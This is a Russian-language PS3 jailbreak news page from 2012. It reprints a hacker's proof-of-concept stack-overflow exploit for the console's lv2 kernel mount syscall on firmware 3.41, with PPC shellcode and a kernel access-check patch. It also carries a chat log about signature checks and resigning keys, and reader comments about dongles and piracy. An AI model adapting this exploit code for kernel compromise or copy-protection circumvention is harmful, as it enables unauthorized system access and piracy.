ГлавнаяОбратная связьВ избранное

PSJailbreak - свободу Playstation!

PSJailbreak.ru - это старейший сайт в рунете посвящённый игровой приставке Playstation 3, запуску сторонних программ и игр на ней. У нас вы найдёте всю самую актуальную информацию по джэилбрэйку консоли.
PSJailBreak » Новости » PS3 LV2_Kernel Exploit Sample Implementation By Naehrwert
Просмотров: 401822-09-2012, 12:08
PS3 LV2_Kernel Exploit Sample Implementation By Naehrwert

Недавно, хакер Naehrwert опубликовал некоторые подробности использования lv2_kernel в PS3 и опубликовал их ан примере прошивки 3.41. А так же была опубликована новая информация от хакера Mathieulh и об его якобы обвинениях во лжи от KaKaRoTo.

Информация по использованию lv2 в PS3 от Naehrwert:

Очень давно KaKaRoTo рассказал мне о переполнении stack, которое он при обратном инженеринге lv2_kernel. Но при этом возникли две проблемы:

1. Уязвимость находится в защищенном syscall (данный SELF должен иметь 0x40… набор управляющих флагов). Таким образом, надо найти подходящий эксплоит (не спрашивайте нас о нем), которая дает вашему коду запускаться с правильными привилегиями.

2. Сначала данные payload копируются в lv2 и функции позволяют сделать free call на него, прежде чем payload сможет выполниться. Может это и не выглядит, как проблема, но это значит, что lv2 будет помогать перезаписывать свободное пространство с участка 0xABADCAFE и тем самым, уничтожать payload.

Здесь мой пример реализации на 3,41 lv2_kernel (хотя уязвимость должна присутствовать во всех версиях lv2 до последней прошивки), может быть, кто-то из вас найдет способ преодолеть эти проблемы (хотя бы под номером 2), и может получить что-то хорошее из этого, потому что на данный момент, это только крашит lv2.


Пример реализации lv2 на прошивке 3.41:

/*
* lv2 sys_mount stack overflow
* Original finder: KaKaRoTo (thank you for pointing it out!)
* Note: all offsets/values/addrs in this source are 3.41 specific
*/

#include
#include
#include

/*
unk2, unk3 is what we're going to use here.
lv2 will handle unk2, unk3 like this:
char *strlist[FIXED_SIZE]; //On stack.
for(i = 0; i < unk3; i++)
strlist = strdup_from_uspace(*unk2++);
*/
static s64 sys_mount(const char *dev /*r3*/, const char *fs /*r4*/, const char *path /*r5*/,
u64 unk0 /*r6*/, u64 wp /*r7*/, u64 unk1 /*r8*/, const char **unk2 /*r9*/, u64 unk3 /*r10*/)
{
lv2syscall8(837, (u64)dev, (u64)fs, (u64)path,
(u64)unk0, (u64)wp, (u64)unk1, (u64)unk2, (u64)unk3);
return_to_user_prog(s64);
}

//For testing.
static void patch_access_check()
{
//check_access @ 0x80000000000505D0
//li r3, 1 ; blr
lv2syscall2(7, 0x80000000000505D0ULL, 0x386000014E800020ULL);
printf("
  • DEBUG: access check patched.\n");
    }

    int main(int argc, const char **argv)
    {
    //Problem: The mount syscall needs the 0x40 ctrl flag (root) to be set.
    //Solution: Find a usermode exploit in a SELF that has them set.

    //Patch the ctrl flags check for testing.
    patch_access_check();

    //Nop.
    char nop[] = "X";

    //Payload.
    char payload[] =
    {
    //Insert valid PPC code here (without 0x00 bytes)
    //and hope lv2 heap 0x27 is executable and 0x04 aligned.
    0x38, 0xE0, 0x7E, 0xF0, //li r7, 0x7EF0
    0x38, 0xE7, 0x01, 0x10, //addi r7, r7, 0x110
    0x78, 0xE7, 0x83, 0xE4, //sldi r7, r7, 16
    0x78, 0xE7, 0x07, 0xC6, //sldi r7, r7, 32
    0x60, 0xE7, 0x91, 0x34, //ori r7, r7, 0x9134
    0x7C, 0xE9, 0x03, 0xA6, //mtctr r7 ; 0x8000000000009134 (sys_sm_shutdown)
    0x38, 0x60, 0x02, 0x10, //li r3, 0x210
    0x38, 0x63, 0xFF, 0xF0, //addi r3, r3, -0x10 ; 0x200 (reboot)
    0x7C, 0x84, 0x22, 0x78, //xor r4, r4, r4 ; 0
    0x7C, 0xA5, 0x2A, 0x78, //xor r5, r5, r5 ; 0
    0x7C, 0xC6, 0x32, 0x78, //xor r6, r6, r6 ; 0
    0x4E, 0x80, 0x04, 0x20, //bctr
    //End of payload.
    0x00
    };

    //List containing the entries.
    //stack frame size is 0x1C0
    //strlist = framptr + 0xE0
    //remaining stack frame size is 0xE0 (28 * 8)
    #define LIST_LENGTH (28 + 2 + 1)
    const char *list[LIST_LENGTH] =
    {
    //-0xE0
    //Overwrite stack with nop entries (0xE0 bytes).
    nop, nop, nop, nop, nop, nop, nop, nop, //0x40
    nop, nop, nop, nop, nop, nop, nop, nop, //0x80
    nop, nop, nop, nop, nop, nop, nop, nop, //0xC0
    nop, nop, nop, nop,
    //0x00
    //Fill 0x10 bytes to reach saved r0.
    nop, nop,
    //+0x10
    //Overwrite saved r0 with a pointer to our payload.
    payload
    };

    //Doit!
    printf("
  • Taking the plunge...\n");
    s64 res = sys_mount("FOO", "BAR", "XXX", 0, 0, 0, list, LIST_LENGTH);
    printf("
  • Error: sys_mount returned (res = 0x%016lX).\n", (u64)res);

    return 0;


  • Наконец сообщения Mathieulh об его ранее, якобы лжи:

    4 сентября 13:16:42 Я просто разместил одну вещь
    4 сентября 13:17:05 я не люблю, когда меня называют "королем лжецов", особенно те, кто ничего не понимает в расшифровке self файлов PS3.
    4 сентября 13:17:25 и да, ранее я ничего не врал.
    4 сентября 13:17:31 это footer signature.
    4 сентября 13:17:33 И она не проверяется
    4 сентября 13:17:35 даже в прошивке 4,21.
    4 сентября 13:17:37 Продолжаем дальше.
    4 сентября 13:17:44 по крайней мере, не на выполнения self npdrm.
    4 сентября 13:17:59 Я считаю, что они проверяются при установке .pkg файлов.
    4 сентября 13:18:03 но есть что-то еще
    4 сентября 13:18:31 Я не думаю, что это было в прошивке 3.55 (функция, которая делает это)
    4 сентября 13:18:33 это была неправильная информация
    4 сентября 13:18:35 которую я дал kakaroto
    4 сентября 13:18:40 но за неделю работы
    4 сентября 13:18:48 со всем, что ему необходимо было знать,
    4 сентября 13:18:52 о self формате
    4 сентября 13:19:16 , но он назвал эту информацию «бесполезной», не раскрывая то, что я дал ему
    4 сентября 13:19:31 и он утверждал, что все это уже было известно.
    4 сентября 13:19:47 он сделал это, чтобы скрыть свою некомпетентность в этом вопросе.
    4 сентября 13:20:04 , он "выпрашивал" у меня (в буквальном смысле), чтобы получить дополнительную информацию, которая ему была нужна, чтобы его взлом работал.
    4 сентября 13:20:09 и я сказал ему, чтобы остальное он додумывал сам.
    4 сентября 13:20:12 , и он ничего не мог
    4 сентября 13:20:19 с этими данными
    4 сентября 13:20:34 zecoxao, я дал ему все что нужно
    4 сентября 13:20:42 , Но он хотел, чтобы всю работу сделал я
    4 сентября 13:20:48 , но я был не согласен с такой позицией
    4 сентября 13:20:58 чем больше я давал ему
    4 сентября 13:21:00 тем больше он просил
    4 сентября 13:21:32 но да
    4 сентября 13:22:03 если вы действительно сможете переподписать LV0, и поставить свой собственный набор ключей в appldr на 4,21
    4 сентября 13:22:16 и установить собственный набор ключей выше, чем 0x0D
    4 сентября 13:22:35 и построить соответствующие npdrm, который имеет все новые appldr проверки, без так называемых footer.
    4 сентября 13:22:37 и запустить это.
    4 сентября 13:22:41 то все будет работать просто отлично...
    4 сентября 13:22:51 (да, я действительно проверял это)
    4 сентября 13:23:18 это разрешает использовать все ключи, старее, чем 0x0D и для npdrm тоже.
    4 сентября 13:23:32 так разработка npdrms на 4,21 не будет работать на OFW сейчас
    4 сентября 13:23:38 и все из-за тупого footer
    4 сентября 13:23:47 но он утверждает, что все, что я ему рассказал, эта наглая ложь.
    4 сентября 13:23:54 И он ничего не проверял.
    4 сентября 13:24:22 Kraparoto забанил меня везде и начала рассказывать о том, что я врун, как только я перестал помогать ему
    4 сентября 13:24:27 повел себя как взрослый, не так ли?
    4 сентября 13:25:22 так что он не только является некомпетентным человеком, ноющий, как ребенок, но и совершенно хочет становится взрослым
    4 сентября 13:25:28 так что я закончил с этой глупой драмой.
    4 сентября 13:25:32 или поговорите с ним.
    Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
    Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
    Посетители
    23 сентября 2012 11:10
    Комментариев: 45

    ggstyle

    Я догадываюсь почему они так долго тянут) ждут выхода ПС4, по скольку Сони подумает *Хэй, а ведь наша зашита работает! раз ее еще никто не взломал! а не сделать ли нам ее же на ПС4? и сэкономить наши деньги на разработку новой? хорошая идея!* и тут бац! через неделю продаж ПС4 выходит полный взлом ПС3 и взлом ПС4! Шах мать его и мат! )))
    Посетители
    22 сентября 2012 20:39
    Комментариев: 53

    ASemV

    еще один ;)
    http://www.ps3crunch.net/forum/threads/4788-KDSBes
    t-releases-his-lv2_exploit-for-v4-20
    Посетители
    22 сентября 2012 16:35
    Комментариев: 61

    kropalidze

    Mathieulh фуфланоид...
    "я тоже знаю как взломать прошивку, но проблема в самой прошивке,а вот если узнать как взламывать прошивку, тогда наверное получится и прошивку взломать..."
    вода на постном масле да еще и спустя полгода после обвинений в его адрес.
    Посетители
    22 сентября 2012 15:57
    Комментариев: 130

    handys

    Потдерживаю
    imp


    --------------------

    Посетители
    22 сентября 2012 15:42
    Комментариев: 717

    dualshock1992

    imp,
    Я не знаю конечно... Но мне кажется что наврядли кто-то захочет повторить TB - они столкнулись с такой волной критики и увенчавшимися успехом попытками взлома донгла (не говоря о бесконечных его клонах), что навряд ли народ снова клюнет на это.
    Посетители
    22 сентября 2012 15:35
    Комментариев: 108

    imp

    dualshock1992, ненависть это одно. Безвыходность-другое. Как в случае с трублу. Больше полугода в новые игры можно было играть только с ним. Вот люди его и покупали.Я думаю если появится донгл который из последней модели пс3 с последней прошивкой будет делать пиратскую пс3, он будет востребованным.
    Посетители
    22 сентября 2012 15:25
    Комментариев: 717

    dualshock1992

    imp,
    Ну а как же тогда массовая ненависть к донглам ? Далеко ходить не надо - даже мой кот ненавидит этот брелок.
    Посетители
    22 сентября 2012 14:44
    Комментариев: 42

    gerasim87

    вся суть сцены пс3 trollface
    http://www.youtube.com/watch?v=XKnncRu1KD4
    Посетители
    22 сентября 2012 14:12
    Комментариев: 583

    neero

    больше не куплю ни одного донгла...никогда.
    хватило трублюй ck
    Посетители
    22 сентября 2012 13:59
    Комментариев: 108

    imp

    На новом взломе пс3 хакеры 100% будут пытаться сделать деньги. Если взлом последних прошивок произойдет, то он по любому будет для обычного пользователя осуществлятся "с помощью" волшебного девайса типа трублю.
    Никаких бесплатных кастомов 4.ХХ, 5.ХХ и далее, ждать в принципе не стоит. По слухам, последние прошивки давно взломаны. Просто хакеры ищут способы делать на этом деньги и из за этого не выпускают взлом.
    Посетители
    22 сентября 2012 12:52
    Комментариев: 717

    dualshock1992

    E3 исчезли. Нехорошие антропоморфные твари)

    Такое ощущение что если бы кто-то на самом деле хотел что-то взломать то все бы уже черти когда сидели на кастоме, но никто не желает ничего делать)

    iSpark,
    Он тоже был не вечен. Да, он на самом деле был молодец, но потом ушел же. Я до сих пор не могу оправится от того безумного ожидания пошпилить в Birth By Sleep, которую никто-и-никак не был в состоянии взломать.
    Журналисты
    22 сентября 2012 12:45
    Комментариев: 6555

    thesixsouls

    Цитата: PlayStation3
    Значит Метью нашёл способ запуска новейших игр,но ничем не будет помогамать пс3-сцене?

    Он нашел способ взлома последних прошивок, но там проблемы с footer (какая-то новая специальная подпись). Что если её взломать, то будет новый кастум.
    Посетители
    22 сентября 2012 12:39
    Комментариев: 160

    iSpark

    Как и всегда...
    Он просто трололо.
    Вот помню был Dark-Alex.Ни слова не трендил, зато регулярные обновления M-33 были, вот что им двигало?
    Посетители
    22 сентября 2012 12:27
    Комментариев: 537

    PlayStation3

    Значит Метью нашёл способ запуска новейших игр,но ничем не будет помогамать пс3-сцене?

    --------------------

    Журналисты
    22 сентября 2012 12:13
    Комментариев: 6555

    thesixsouls

    Цитата: neero
    скинте кто нибудь линк на последний спуфер для 3.55 KMEAW

    Держи
    Посетители
    22 сентября 2012 12:10
    Комментариев: 583

    neero

    скинте кто нибудь линк на последний спуфер для 3.55 KMEAW
    Информация
    Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.

    Новости о взломе PS4
    Последнее с форума

    Свежие прошивки для PS3
    Доска почета
    • ave187
      Модератор
      Эксперт
    • John050882
      Ньюсмэйкер
      Эксперт
    • PSP
      Завсегдатай
      Эксперт
    • Battou
      Завсегдатай
      Эксперт
    • Dr13
      Модератор
      Эксперт
    Новости о взломе PS4
    Присоединяйся к нашей дружной компании!
    Новости PS4
    • Геймплей Uncharted: The Lost Legacy с Е3

      Как отметили многие журналисты — пресс-конференция Sony на Е3 в этом году ничем не отличалась от прошлогодней — все те-же самые игры и никаких значимых анонсов. Собственно по этому мы и ...

    • Прошивка 4.50 выйдет завтра: вот что в ней нового

      После нескольких месяцев тестирования завтра, 9 марта выходит прошивка 4.50 (кодовое имя SASUKE) для PS4. И вот какие новые функции вы в ней найдёте после установки: Внешний HDD: У вас есть внешний ...

    • Вышла прошивка 4.00 «Shingen» для PS4 — вот что в ней нового

      Очередное крупное обновление системного программного обеспечения 4.00 (кодовое имя «Shingen») для PlayStation 4 будет доступно уже завтра. Благодаря ему вы получите обновленную систему интерфейса, ...

    • Лайвблог с Playstation Meeting в Нью-Йорке

      Всем привет! Это лайвблог с мероприятия Playstation Meeting проходящего в Нью-Йорке 7 сентября. На сцене Эндрю Хаус Playstation 4 Slim представлена без лишних прелюдий 299$ — стоимость новой ...

    • PS4 Slim разобрали до винтика

      Это возмутительно! Ещё не анонсированная консоль PS4 Slim, существование которой Sony упорно отрицает, попала в руки к мастеру, который разобрал её до винтика и заснял весь процесс на видео. Из ...

    Свежие прошивки для PS3
    Архив новостей
    Июль 2018 (5)
    Июнь 2018 (5)
    Май 2018 (3)
    Апрель 2018 (8)
    Март 2018 (11)
    Февраль 2018 (4)